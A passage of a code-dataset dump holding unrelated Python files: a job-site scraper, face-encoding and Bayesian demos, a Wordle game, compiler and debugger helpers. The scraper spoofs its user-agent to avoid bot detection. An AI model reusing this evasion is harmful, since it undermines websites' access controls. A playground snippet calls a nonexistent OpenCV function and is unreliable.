html = driver.page_source\n a = 0\n while a<20:\n search_result.append(html)\n time.sleep(1)\n i = 0\n while i < 4:\n driver.execute_script(\"window.scrollTo(0, window.scrollY + 1500)\") \n time.sleep(.2)\n i+=1\n time.sleep(4)\n click(npage)\n html = driver.page_source\n a += 1\n return search_result\n\n\n# In[4]:\n\n\nsearch_result_1 = []\n\n\n# In[5]:\n\n\nurls = [\"https://www.stepstone.de/jobs/python-data-analyst\",\"https://www.stepstone.de/jobs/sql-data-analyst\",\"https://www.stepstone.de/jobs/tableau-data-analyst\",\"https://www.stepstone.de/jobs/tableau-business-intelligence\"]\n\n\n# In[11]:\n\n\ndriver = webdriver.Chrome(ChromeDriverManager().install())\nsearch_result_1.extend(scrape_pages(urls[3]))\n\n\n# In[12]:\n\n\njob_url_1 = []\nfor h in tqdm(search_result_1):\n soup = bs4(h)\n res = soup.find_all(\"article\",{\"class\":\"resultlist-1jx3vjx\"})\n for r in res:\n href = r.find(\"a\",{\"class\":\"resultlist-1uvdp0v\"}).get(\"href\")\n href = \"https://www.stepstone.de\"+href\n job_url_1.append(href)\ndf_1 = pd.DataFrame(columns = [\"job_url\"])\ndf_1[\"job_url\"] = job_url_1\n\n\n# In[13]:\n\n\ndf_1 = df_1.drop_duplicates(subset = \"job_url\").reset_index(drop = True)\n\n\n# In[14]:\n\n\n# df_1.to_csv(\"job url 1.csv\", index = False)\n\n\n# In[15]:\n\n\n# df_1 = pd.read_csv(\"job url 1.csv\")\n\n\n# In[20]:\n\n\ndef get_page_source(df_url):\n source = []\n job_url = df_url[\"job_url\"].tolist()\n options = Options()\n # installing chromedriver, so that we dont need to keep the chromedriver file\n # that needs to be updated every once in a while. better install the latest automatically\n driver = webdriver.Chrome(ChromeDriverManager().install())\n for i in job_url: # get full page source for each job offer page\n # options.add_argument(\"--disable-notifications\")\n # to prevent from being spotted as a robot\n options.add_argument('--disable-gpu')\n options.add_argument('user-agent=fake-useragent')\n # opens the browser, maximize window size\n # opening url\n driver.get(i)\n time.sleep(3.5)\n page = driver.page_source\n source.append(page)\n # saving source column separately for each splitted file\n job_source = pd.DataFrame(columns = [\"job_source\"])\n job_source[\"job_source\"] = source\n filename = \"job source 1.csv\"\n job_source.to_csv(filename, index = False)\n return job_source\n\n\n# In[21]:\n\n\nsource = get_page_source(df_1)\n\n\n# getting some details from each page source we had from the big scraping job (see cell above)\n\n# In[51]:\n\n\ndf_stepstone = pd.DataFrame()\nurl_1,d_1,t_1,cn_1,cl_1,c_1= [],[],[],[],[],[]\n\ndf1 = df_1.copy()\ndf2 = source.copy()\ndescription_1,title_1,comp_name_1,comp_url_1,city_1 = [],[],[],[],[]\nsource = df2[\"job_source\"].tolist()\nfor s in source:\n soup = bs4(s, \"html.parser\")\n try:\n jobtitle = soup.find(\"span\",{\"data-at\":\"header-job-title\"}).text\n except:\n jobtitle = \"unknown\"\n title_1.append(jobtitle)\n try:\n compname = soup.find(\"a\",{\"data-at\":\"header-company-name\"}).text\n except:\n compname = \"unknown\"\n comp_name_1.append(compname)\n try:\n complink = soup.find(\"a\",{\"data-at\":\"header-company-name\"}).get(\"href\")\n except:\n complink = \"unknown\"\n comp_url_1.append(complink)\n try:\n city = soup.find(\"span\",{\"class\":\"listing-content-provider-1u79rpn\"}).text\n except:\n city = \"unknown\"\n city_1.append(city)\n infotext = soup.find_all(\"div\",{\"class\":\"listing-content-provider-10ltcrf\"})\n desc = []\n for i in infotext:\n try:\n texts = i.find_all(\"p\")\n for t in texts:\n info = t.text\n desc.append(info)\n except:\n pass\n try:\n texts = i.find_all(\"li\")\n for t in texts:\n info = t.text\n desc.append(info)\n except:\n pass\n # enemy spotted\n description = \" \".join(desc).replace(\"\\xa0\",\"\").replace(\"\\\\n\",\"\")\n description_1.append(description)\nd_1.extend(description_1)\nt_1.extend(title_1)\ncn_1.extend(comp_name_1)\ncl_1.extend(comp_url_1)\nc_1.extend(city_1)\nurl_1.extend(df1[\"job_url\"].tolist())\n\n\n# In[53]:\n\n\ndf_stepstone[\"job_url\"] = url_1\ndf_stepstone[\"description\"] = d_1\ndf_stepstone[\"job_title\"] = t_1\ndf_stepstone[\"comp_name\"] = cn_1\ndf_stepstone[\"comp_link\"] = cl_1\ndf_stepstone[\"city\"] = c_1\n\n\n# In[57]:\n\n\ndf_stepstone = df_stepstone[df_stepstone[\"description\"] != \"\"]\n\n\n# In[58]:\n\n\nimport numpy as np\n\n\n# In[60]:\n\n\ndf_stepstone.to_csv(\"stepstone 1 incomplete.csv\", index = False)\n\n\n# ### now scrape from indeed.com\n\n# In[3]:\n\n\nfrom selenium.webdriver.common.keys import Keys\n\n\n# In[14]:\n\n\ndef scrape_indeed(key): \n url2 = \"https://de.indeed.com/?r=us\"\n options = Options()\n # options.add_argument(\"--disable-notifications\")\n # to prevent from being spotted as a robot\n options.add_argument('--disable-gpu')\n options.add_argument('user-agent=fake-useragent')\n # opening url\n driver.get(url2)\n time.sleep(2)\n search_xpath = \"/html/body/div[1]/div[1]/div/span/div[4]/div[2]/div/div/div/div/form/div/div[1]/div/div[1]/div/div[2]/input\"\n search = driver.find_element(By.XPATH,search_xpath)\n\n search.send_keys(key)\n findjob_xpath = \"/html/body/div[1]/div[1]/div/span/div[4]/div[2]/div/div/div/div/form/button\"\n click(findjob_xpath)\n\n html = driver.page_source\n npage = \"/html/body/main/div/div[1]/div/div/div[5]/div[1]/nav/div[6]/a\"\n lhtml2 = []\n counter = 1\n a = 0\n while a < 30:\n if counter == 2:\n time.sleep(2)\n webdriver.ActionChains(driver).send_keys(Keys.ESCAPE).perform()\n lhtml2.append(html)\n time.sleep(1)\n i = 0\n while i < 4:\n driver.execute_script(\"window.scrollTo(0, window.scrollY + 1500)\") \n time.sleep(.2)\n i+=1\n time.sleep(1)\n try:\n click(npage)\n except:\n a = 30\n counter += 1\n html = driver.page_source\n # comparing html_before and html_after\n a += 1\n return lhtml2\n\n\n# In[15]:\n\n\nkeys = [\"sql data analyst\",\"python data analyst\",\"tableau data analyst\",\"tableau business intelligence\"]\ndriver = webdriver.Chrome(ChromeDriverManager().install())\nlhtml2 = []\nfor key in keys:\n lhtml2.extend(scrape_indeed(key))\n\n\n# In[16]:\n\n\nlhref2 = []\nfor h in tqdm(lhtml2):\n soup = bs4(h)\n container = soup.find(\"ul\",{\"class\":\"jobsearch-ResultsList css-0\"})\n res = container.find_all(\"div\",{\"class\":\"slider_container css-g7s71f eu4oa1w0\"})\n for r in res:\n href = r.find(\"h2\",{\"tabindex\":\"-1\"}).find(\"a\").get(\"href\")\n href = \"https://de.indeed.com\" + href\n lhref2.append(href)\nhref_pd2 = pd.DataFrame(columns = [\"job_url\"])\nhref_pd2[\"job_url\"] = lhref2\n\n\n# In[20]:\n\n\nsource2 = []\noptions = Options()\n# installing chromedriver, so that we dont need to keep the chromedriver file\n# that needs to be updated every once in a while. better install the latest automatically\ndriver = webdriver.Chrome(ChromeDriverManager().install())\nfor i in tqdm(lhref2):\n # options.add_argument(\"--disable-notifications\")\n # to prevent from being spotted as a robot\n options.add_argument('--disable-gpu')\n options.add_argument('user-agent=fake-useragent')\n # opening url\n driver.get(i)\n time.sleep(3)\n page = driver.page_source\n source2.append(page)\nhref_pd2[\"job_source\"] = source2\n\n\n# In[21]:\n\n\n\n\n\n# In[22]:\n\n\nldescription2,ltitle2,lcompname2,lcomplink2,lcity2 = [],[],[],[],[]\n\nfor s in tqdm(source2):\n soup = bs4(s, \"html.parser\")\n try:\n jobtitle = soup.find(\"h1\",{\"class\":\"icl-u-xs-mb--xs icl-u-xs-mt--none jobsearch-JobInfoHeader-title\"}).text\n except:\n jobtitle = None\n ltitle2.append(jobtitle)\n try:\n compname = soup.find(\"div\",{\"data-company-name\":\"true\"}).text\n except:\n compname = None\n lcompname2.append(compname)\n try:\n complink = soup.find(\"div\",{\"data-company-name\":\"true\"}).find(\"a\").get(\"href\")\n except:\n complink = None\n lcomplink2.append(complink)\n city = None\n lcity2.append(city)\n infotext = soup.find(\"div\",{\"id\":\"jobDescriptionText\"}).find_all(\"p\")\n desc = []\n for i in infotext:\n try:\n texts = i.find(\"b\").text\n desc.append(texts)\n except:\n texts = i.text\n desc.append(texts)\n # enemy spotted\n description = \" \".join(desc)\n ldescription2.append(description)\n\n\n# In[23]:\n\n\nhref_pd2[\"description\"] = ldescription2\nhref_pd2[\"job_title\"] = ltitle2\nhref_pd2[\"comp_name\"] = lcompname2\nhref_pd2[\"comp_link\"] = lcomplink2\nhref_pd2[\"city\"] = lcity2\nhref_pd2.to_csv(\"indeed 1 incomplete.csv\", index = False)\n\n\n# In[24]:\n\n\nhref_pd2 = pd.read_csv(\"indeed 1 incomplete.csv\")\n\n\n# In[27]:\n\n\nhref_pd = pd.read_csv(\"stepstone 1 incomplete.csv\")\n\n\n# In[36]:\n\n\nfull = pd.concat([href_pd, href_pd2], axis = 0)\n\n\n# In[37]:\n\n\nfull = full[full[\"description\"] != \"\"]\nfull = full.drop(columns = [\"job_source\"])\n\n\n# In[38]:\n\n\nfull.to_csv(\"full.csv\", index = False)\ndf = full.copy()\n\n\n# In[ ]:\n\n\ndf = df.dropna(subset = [\"comp_link\"])\n\n\n# In[ ]:\n\n\nquerying = [\"data\",\"analy\",\"analy\",\"sql\",\"sql\",\"sql\",\"big data\",\"query\",\"entry\",\"base\",\"warehouse\"] #A\nengineering = [\"python\",\"python\",\"data\",\"analy\",\"analy\",\"machine\",\"learn\",\"etl\",\"oop\",\"pipe\",\"pipe\",\"tensor\",\"engineer\",\"nlp\"] #B\nanalysis = [\"python\",\"python\",\"python\",\"data\",\"analy\",\"analy\",\"eda\",\"predict\",\"machine\",\"learn\",\"test\",\"explor\",\"statisti\"] #C\nmodel_building = [\"python\",\"python\",\"data\",\"analy\",\"analy\",\"machine\",\"machine\",\"learn\",\"predict\",\"ml\",\"model\",\"model\",\"train\"] #D\nscraping = [\"python\",\"python\",\"python\",\"data\",\"analy\",\"analy\",\"clean\",\"mining\",\"scrap\",\"csv\",\"json\",\"api\"] #E\ndashboarding = [\"bi\",\"bi\",\"power\",\"data\",\"analy\",\"analy\",\"dashboard\",\"tableau\",\"tableau\",\"tableau\",\"report\",\"visuali\"] #F\ncategory = [querying, engineering, analysis, model_building, scraping, dashboarding]\n\n\n# In[ ]:\n\n\nA,B,C,D,E,F = [],[],[],[],[],[]\n\nscores = [A,B,C,D,E,F]\ndescription = df.description.tolist()\nfor des in tqdm(description):\n for score, cat in list(zip(scores, category)):\n sc = []\n for i in cat:\n if i in str(des).lower():\n sc.append(1)\n # else:\n # sc.append(0)\n n = len(sc)/len(cat)*100\n score.append(round(n,2)) \n\n\n# In[ ]:\n\n\ndf[\"querying\"] = A\ndf[\"engineering\"] = B\ndf[\"analysis\"] = C\ndf[\"model_building\"] = D\ndf[\"scraping\"] = E\ndf[\"dashboarding\"] = F\ndf = df.fillna(\"unknown\")\n\n\n# In[ ]:\n\n\ncity = []\nfor i in df[\"city\"]:\n if \",\" in i:\n i= \"multiple cities\"\n city.append(i)\n else:\n city.append(i)\ndf[\"city\"] = city\n\n\n# In[ ]:\n\n\nX = df.drop(columns=[\"job_url\",\"description\",\"comp_link\"])\ndf.to_csv(\"data clean with url.csv\", index = False)\nX.to_csv(\"data clean.csv\", index = False)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"mdimasaac/data-analyst-job-search-assistant","sub_path":"updating_database.py","file_name":"updating_database.py","file_ext":"py","file_size_in_byte":12332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"18064661784","text":"# Keys from the archive\nNAME_KEY = \"pl_name\"\nPER_KEY = \"pl_orbper\"\nTP_KEY = \"pl_orbtper\"\nTC_KEY = \"pl_tranmid\"\nECC_KEY = \"pl_orbeccen\"\nOMEGA_KEY = \"pl_orblper\"\nK_KEY = \"pl_rvamp\"\nTRANSIT_FLAG = \"tran_flag\"\n\n# Keys used to model orbit\nORB_KEYS = [PER_KEY, TP_KEY, ECC_KEY, OMEGA_KEY, K_KEY]\nORB_KEYS_REFS = [ok + \"_reflink\" for ok in ORB_KEYS]\nORB_KEYS_ERRS = [ok + ek for ok in ORB_KEYS for ek in (\"err1\", \"err2\")]\n\nCONTROV_FLAG = \"pl_controv_flag\"\n","repo_name":"vandalt/ephemere","sub_path":"ephemere/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22478179613","text":"import time\nimport os\nimport numpy as np\nimport face_recognition\nfrom veriff.data.context import Context\nfrom veriff.handler import AbstractHandler\nfrom veriff.helper.logger_util import get_logger\nimport ray\nfrom veriff.consts import RUNNING_MODE_ENV, HEAD_SERVICE_IP_ENV, HEAD_SERVICE_CLIENT_PORT_ENV\n\n\nlogger = get_logger(__name__)\n\n\n@ray.remote\ndef face_encodings(image_path):\n image_data = face_recognition.load_image_file(image_path)\n\n face_vectors = face_recognition.face_encodings(image_data)\n if not face_vectors:\n logger.warning(\"face encodings failed. vector not found for image %r\", image_path)\n # return empty array\n return np.empty((128,), dtype=int)\n\n return face_vectors[0]\n\n\nclass FaceVectorCalculatorHandler(AbstractHandler):\n \"\"\"\n FaceVectorCalculatorHandler is used to calculate average face vector\n \"\"\"\n def handle(self, context: Context):\n start_time = time.time()\n logger.info(\"face-vector calculator start\")\n\n face_images_data_list = context.data_set\n\n # ray init\n running_mode = os.getenv(RUNNING_MODE_ENV, 'local')\n if running_mode == 'local':\n ray.init()\n else:\n # Kubernetes inject ip address of ray cluster head service into head_svc env variable\n head_service_ip = os.environ[os.environ[HEAD_SERVICE_IP_ENV]]\n client_port = os.environ[os.environ[HEAD_SERVICE_CLIENT_PORT_ENV]]\n ray.util.connect(f\"{head_service_ip}:{client_port}\")\n logger.info(\"ray init done\")\n\n refs = [face_encodings.remote(image_path) for image_path in face_images_data_list]\n face_vectors = ray.get(refs)\n logger.info(\"face-encoding jobs completed\")\n\n # average operation on vectors\n context.result = np.mean(face_vectors, axis=0)\n logger.info(\"face-vector calculator completed. took %r seconds\", (time.time() - start_time))\n self.next.handle(context)\n\n","repo_name":"quebic-source/veriff-assessment","sub_path":"veriff/handler/execution_handler.py","file_name":"execution_handler.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73759408210","text":"# 3. 도시별 최근 3일의 온도입니다.\ncity = {\n '서울': [-6, -10, 5],\n '대전': [-3, -5, 2],\n '광주': [0, -2, 10],\n '부산': [2, -2, 9],\n}\n# 3-2. 도시 중에 최근 3일 중에 가장 추웠던 곳, 가장 더웠던 곳은?\nmintem = 100\nmaxtem = -100\nmaxcit = \"\"\nmincit = \"\"\nfor cit in city.keys() : \n for tem in city[cit]:\n if tem > maxtem :\n maxcit = cit\n maxtem = tem\n if tem < mintem :\n mincit = cit\n mintem = tem\n \n# 아래에 코드를 작성해 주세요.\nprint(f'최근 3일중 가장 온도가 높았던 지역은 {maxcit}에서 {maxtem}도 이였고, 가장 온도가 낮았던 지역은 {mincit}에서 {mintem}도 였습니다.')","repo_name":"airpong/TIL","sub_path":"startcamp/day04/quizz/quizz3-2.py","file_name":"quizz3-2.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"12696984531","text":"import numpy as np\nimport cv2\n\ndef constructIntrinsicMatrix(frameResolution, sensorHeight, focalLength):\n \"\"\"\n @param frameResolution: (width, height) in pixels\n @param sensorWidth: width of the sensor in mm\n @param sensorHeight: height of the sensor in mm\n @param focalLength: focal length of the lens in mm\n \"\"\"\n aspectRatio = frameResolution[0] / frameResolution[1]\n fx = focalLength * frameResolution[0] / (sensorHeight * aspectRatio)\n fy = focalLength * frameResolution[1] / sensorHeight\n cx = frameResolution[0] / 2\n cy = frameResolution[1] / 2\n return np.matrix([[fx, 0, cx], [0, fy, cy], [0, 0, 1]])\n\ndef computeProjectionMatrix(camera, worldObject):\n \"\"\"\n @param camera: Camera object\n @param worldObject: WorldObject object\n \"\"\"\n # Get the rotation matrix\n rotation = np.matrix([[np.cos(worldObject.rotation[0]), -np.sin(worldObject.rotation[0]), 0],\n [np.sin(worldObject.rotation[0]), np.cos(worldObject.rotation[0]), 0],\n [0, 0, 1]])\n # Get the translation matrix\n translation = np.matrix([[1, 0, 0, -worldObject.location[0]],\n [0, 1, 0, -worldObject.location[1]],\n [0, 0, 1, -worldObject.location[2]],\n [0, 0, 0, 1]])\n # Get the extrinsic matrix\n extrinsic = rotation * translation\n # Get the intrinsic matrix\n intrinsic = constructIntrinsicMatrix(camera.resolution, camera.sensorHeight, camera.focalLength)\n # Get the projection matrix\n projection = intrinsic * extrinsic\n return projection\n\n\n\ncv2.createCameraMatrix(27)","repo_name":"rems64/Tracker","sub_path":"playground2.py","file_name":"playground2.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"31604714770","text":"from dila2sql.utils import connect_db\nfrom tqdm import tqdm\nfrom argparse import ArgumentParser\nimport datetime\nfrom dila2sql.models import db_proxy, Conteneur, Tetier, Sommaire\nfrom peewee import fn\n\ntoday = datetime.date.today()\n\n\ndef add_base_text_column(db):\n db.execute_sql(\"\"\"\n ALTER TABLE conteneurs\n ADD COLUMN IF NOT EXISTS texte_de_base TEXT;\n \"\"\")\n\n\ndef set_base_text_on_conteneurs(db):\n warnings = []\n conteneurs = Conteneur \\\n .select() \\\n .where(Conteneur.nature == 'IDCC') \\\n .where(Conteneur.active == True)\n for conteneur in tqdm(conteneurs):\n tetiers = Tetier \\\n .select() \\\n .where(Tetier.titre_tm == 'Texte de base') \\\n .where(Tetier.conteneur_id == conteneur.id)\n if tetiers.count() != 1:\n warnings.append(\n \"/!\\\\ %s tetiers 'Texte de base' found for conteneur %s\" %\n (len(tetiers), conteneur.id)\n )\n continue\n tetier_id = tetiers[0].id\n textes_de_base = Sommaire \\\n .select() \\\n .where(Sommaire.parent == tetier_id) \\\n .where(\n (\n (Sommaire.debut <= today) |\n (Sommaire.debut.is_null())) &\n (\n (Sommaire.fin >= today) |\n (Sommaire.fin.is_null()) |\n (fn.LEFT(Sommaire.etat, 7) == 'VIGUEUR')\n )\n )\n if textes_de_base.count() == 0:\n warnings.append(\n \"/!\\\\ no textes de bases in sommaires for conteneur %s \"\n \"- tetier %s\" %\n (conteneur.id, tetier_id)\n )\n continue\n if textes_de_base.count() > 1:\n warnings.append(\n \"%s textes de bases in sommaires for conteneur %s - tetier %s\"\n \", using first\" %\n (textes_de_base.count(), conteneur.id, tetier_id)\n )\n texte_id = textes_de_base[0].element\n Conteneur.update(texte_de_base=texte_id) \\\n .where(Conteneur.id == conteneur.id) \\\n .execute()\n for warning in warnings:\n print(warning)\n\n\ndef run(db):\n add_base_text_column(db)\n set_base_text_on_conteneurs(db)\n\n\nif __name__ == '__main__':\n p = ArgumentParser()\n p.add_argument('db')\n args = p.parse_args()\n db = connect_db(args.db)\n db_proxy.initialize(db)\n run(db)\n","repo_name":"SocialGouv/dila2sql","sub_path":"packages/dila2sql/dila2sql/postprocess_scripts/kali/add_base_text_to_conteneurs.py","file_name":"add_base_text_to_conteneurs.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"fr","doc_type":"code","dataset":"github-code","pt":"66"} +{"seq_id":"7240693515","text":"from .expr import Expr\nfrom lexer.num import Num\nfrom symbols.type import Type\nfrom lexer.word import Word\n\n\nclass Constant(Expr):\n def __init__(self, token=None, type_=None, i=None):\n if i:\n super().__init__(Num(i), Type.int_)\n else:\n super().__init__(token, type_)\n\nConstant.true = Constant(token=Word.true, type_=Type.bool_)\nConstant.false = Constant(token=Word.false, type_=Type.bool_)\n\n\ndef jumping(constant, t, f):\n if constant == Constant.true and t != 0:\n constant.emit('goto L{}'.format(t))\n elif constant == Constant.false and f != 0:\n constant.emit('goto L{}'.format(f))\n\nConstant.jumping = jumping\n","repo_name":"talespadua/Simple-Python-Compiler","sub_path":"inter/constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21683951801","text":"'''mssg='hello'\r\nindex=0\r\nfor i in mssg:\r\n print(i)\r\n index+=1'''\r\n\r\n'''a='hello welcome to python'\r\ni=2\r\nprint(a[2:8:2]) '''\r\n\r\n'''a=str('hello')\r\nb=str('welcome to python')\r\nprint(a+','+b)\r\nprint(a+b)'''\r\n\r\n'''a='hello and welcome to python'\r\nprint(a.capitalize())\r\nb='el'\r\nprint(a.count(b,0,len(a)))\r\nprint(a.endswith('on',0,len(a)))'''\r\n\r\n'''a='BoNd007'\r\nb='007'\r\nc='abcd'\r\nprint(b.isalnum())\r\nprint(c.isalpha())\r\nprint(a.swapcase())\r\nprint(a.replace('B','b'))'''\r\n\r\n'''a='welcome to python'\r\nb='t'\r\nprint(a.startswith('t',0,len(a)))\r\nprint(a.endswith('t',0,len(a)))\r\nprint(a.count('t',0,len(a)))\r\nif b in a:\r\n print('found')\r\nelse:\r\n print('not found')'''\r\n\r\n#ASCII A-Z=65-90 and a-z=97-122 \r\n\r\n'''a='welcome to python'\r\nfor i in a:\r\n print(i,end=' ')'''\r\n\r\n'''a='welcome to python'\r\ni=0\r\nwhile i int:\n length = len(nums)\n if length < 2:\n return length\n i = 0\n j = 1\n while j < length:\n if nums[i] != nums[j]:\n i += 1\n nums[i] = nums[j]\n j += 1\n print(nums[:i + 1])\n return i + 1\n\n\ndef removeElement(nums, val) -> int:\n length = len(nums)\n i = 0\n j = length-1\n while i <= j:\n if nums[i] == val:\n temp = nums[j]\n nums[j] = nums[i]\n nums[i] = temp\n j -= 1\n else:\n i += 1\n return j+1","repo_name":"Akhilj786/CodingChallenge","sub_path":"LeetCode/src/RemoveDuplicate.py","file_name":"RemoveDuplicate.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39555297602","text":"import os\n\nfrom config import config\nfrom datasets.small_arc_dataset import SmallArcDirectGridDataset\nfrom prompting_classes.common import register_class\nfrom prompting_classes.zero_shot_prompt_convertor import ZeroShotPromptConvertor\n\n\n@register_class\nclass CoTPromptConvertor(ZeroShotPromptConvertor):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.dataset = SmallArcDirectGridDataset(config['dataset_location'])\n self.tasks = config.prompt_config.cot_tasks\n\n def get_task_as_cot_prompt(self, task_id):\n location = os.path.join(config.prompt_config.cot_prompt_location, f'{task_id}.txt')\n data, trains, tests = self.dataset.get_by_task_id(task_id)\n prompt_allged_input = ZeroShotPromptConvertor.convert_task_to_prompt(self, trains, tests)\n with open(location, 'r') as f:\n alleged_output = f.read()\n for idx in range(len(self.to_prompt_dict)):\n alleged_output = alleged_output.replace('{' + f'{str(idx)}' + '}', self.to_prompt_dict[idx])\n out_as_text = self.convert_mat_to_text(tests[0]['output'])\n alleged_output = alleged_output.replace('{out}', out_as_text)\n return prompt_allged_input + alleged_output\n\n def convert_task_to_prompt(self, train, test):\n cot_prompts = []\n for task in self.tasks:\n cot_prompts.append(self.get_task_as_cot_prompt(task))\n total_cot = ''\n for idx, prompt in enumerate(cot_prompts):\n total_cot += cot_prompts[idx] + '\\n'\n start_prompt = self.prompt_start # .format(len(self.train))\n training_prompt = \"\\n\"\n for idx, example in enumerate(train):\n inp = self.convert_mat_to_text(example['input'])\n out = self.convert_mat_to_text(example['output'])\n # training_prompt += numbers_to_letters[idx] + \".\\n\"\n training_prompt += f\"input {idx}:\\n{inp}\\noutput {idx}:\\n{out}\\n\\n\"\n test_prompt = self.prompt_test + '\\n'\n test_prompt += f\"input:\\n{self.convert_mat_to_text(test[0]['input'])}\"\n\n return total_cot + start_prompt + training_prompt + test_prompt + self.prompt_end\n","repo_name":"ethanbar11/arc","sub_path":"prompting_classes/cot_prompt_convertor.py","file_name":"cot_prompt_convertor.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17920730502","text":"import csv\nimport random\n\nwith open('words.txt') as file:\n reader = csv.reader(file)\n words = list(reader)\n \nwords = [item for sublist in words for item in sublist]\n\n# Pick random word as answer\nanswer = random.choice(words).lower() # Convert answer to lowercase for case-insensitive comparison\n\n# Game variables\nguesses = []\nmax_guesses = 6\n\n# Print header\nprint(\"{:<10} {:<}\".format(\"Guess #\", \"Guess\"))\nprint(\"{:-<21}\".format(\"\"))\n\n# Main game loop\nfor guess_num in range(max_guesses):\n\n # Get player's guess\n guess = input(\"{:<10} \".format(guess_num+1)).strip().lower() # Convert guess to lowercase and remove leading/trailing spaces\n\n # Validate guess\n if len(guess) != 6:\n print(\"Invalid guess - must be 6 letters!\")\n continue\n\n if not guess.isalpha():\n print(\"Invalid guess - letters only!\")\n continue\n\n # Check if already guessed\n if guess in guesses:\n print(\"You already guessed that word!\")\n continue\n\n # Add valid guess\n guesses.append(guess)\n\n # Print guess\n print(guess)\n\n # Check for winning guess\n if guess == answer:\n print(\"You got it! The word was\", answer)\n break\n \n # Give feedback on incorrect guess\n else:\n print(\"Correct position of guess:\")\n \n # Track correct letters and positions\n correct_letters = set()\n letter_positions = {}\n \n for i, letter in enumerate(guess):\n if letter == answer[i]:\n letter_positions[i] = letter\n elif letter in answer:\n correct_letters.add(letter)\n \n # Print position matches \n for i in range(6):\n if i in letter_positions:\n print(f\"{letter_positions[i]} is in position {i+1}\")\n \n # Print correct letters\n if correct_letters:\n print(\"Incorrect Position of Letters:\", \", \".join(correct_letters)) \n \n print()\n \n# Game over message\nif len(guesses) == max_guesses:\n print(\"You ran out of guesses. The word was\", answer)\n","repo_name":"AashishH15/6-Letter-Wordle","sub_path":"Wordle.py","file_name":"Wordle.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17883148585","text":"from _pydevd_bundle import pydevd_thrift\nfrom _pydevd_bundle.pydevd_comm import PyDBDaemonThread\nfrom _pydevd_bundle.pydevd_comm import threading\nfrom _pydevd_bundle.pydevd_comm import time\nfrom _pydevd_bundle.pydevd_constants import ASYNC_EVAL_TIMEOUT_SEC\n\n\nclass ThriftAbstractGetValueAsyncThread(PyDBDaemonThread):\n \"\"\"\n Abstract class for a thread, which evaluates values for async variables\n \"\"\"\n def __init__(self, server, seq, var_objects, user_type_renderers=None):\n PyDBDaemonThread.__init__(self)\n self.server = server\n self.seq = seq\n self.var_objs = var_objects\n self.cancel_event = threading.Event()\n self.user_type_renderers = user_type_renderers\n\n def send_result(self, xml):\n raise NotImplementedError()\n\n def _on_run(self):\n start = time.time()\n values = []\n for (var_obj, name) in self.var_objs:\n current_time = time.time()\n if current_time - start > ASYNC_EVAL_TIMEOUT_SEC or self.cancel_event.is_set():\n break\n # pydev_console_thrift.DebugValue()\n values.append(pydevd_thrift.var_to_struct(var_obj, name, evaluate_full_value=True, user_type_renderers=self.user_type_renderers))\n self.send_result(values)\n\n\nclass ThriftGetValueAsyncThreadConsole(ThriftAbstractGetValueAsyncThread):\n \"\"\"\n A thread for evaluation async values, which returns result for Console\n Send result directly to Console's server\n \"\"\"\n def send_result(self, values):\n if self.server is not None:\n self.server.returnFullValue(self.seq, values)\n","repo_name":"JetBrains/intellij-community","sub_path":"python/helpers/pydev/_pydev_bundle/pydev_console_commands.py","file_name":"pydev_console_commands.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":16005,"dataset":"github-code","pt":"66"} +{"seq_id":"41890701945","text":"import numpy as np\nimport scipy\n\nimport matplotlib.pyplot as plt\nimport bayespy.plot as myplt\n\nfrom bayespy.utils import misc\nfrom bayespy.utils import random\nfrom bayespy.nodes import Gaussian, Categorical, Mixture, Dirichlet\n\nfrom bayespy.inference.vmp.vmp import VB\nfrom bayespy.inference.vmp import transformations\n\nimport bayespy.plot as bpplt\n\nfrom bayespy.demos import pca\n\n\ndef run(N=100000, N_batch=50, seed=42, maxiter=100, plot=True):\n \"\"\"\n Run deterministic annealing demo for 1-D Gaussian mixture.\n \"\"\"\n\n if seed is not None:\n np.random.seed(seed)\n\n # Number of clusters in the model\n K = 20\n\n # Dimensionality of the data\n D = 5\n\n # Generate data\n K_true = 10\n spread = 5\n means = spread * np.random.randn(K_true, D)\n z = random.categorical(np.ones(K_true), size=N)\n data = np.empty((N,D))\n for n in range(N):\n data[n] = means[z[n]] + np.random.randn(D)\n\n #\n # Standard VB-EM algorithm\n #\n\n # Full model\n mu = Gaussian(np.zeros(D), np.identity(D),\n plates=(K,),\n name='means')\n alpha = Dirichlet(np.ones(K),\n name='class probabilities')\n Z = Categorical(alpha,\n plates=(N,),\n name='classes')\n Y = Mixture(Z, Gaussian, mu, np.identity(D),\n name='observations')\n\n # Break symmetry with random initialization of the means\n mu.initialize_from_random()\n\n # Put the data in\n Y.observe(data)\n\n # Run inference\n Q = VB(Y, Z, mu, alpha)\n Q.save(mu)\n Q.update(repeat=maxiter)\n if plot:\n bpplt.pyplot.plot(np.cumsum(Q.cputime), Q.L, 'k-')\n max_cputime = np.sum(Q.cputime[~np.isnan(Q.cputime)])\n\n\n #\n # Stochastic variational inference\n #\n\n # Construct smaller model (size of 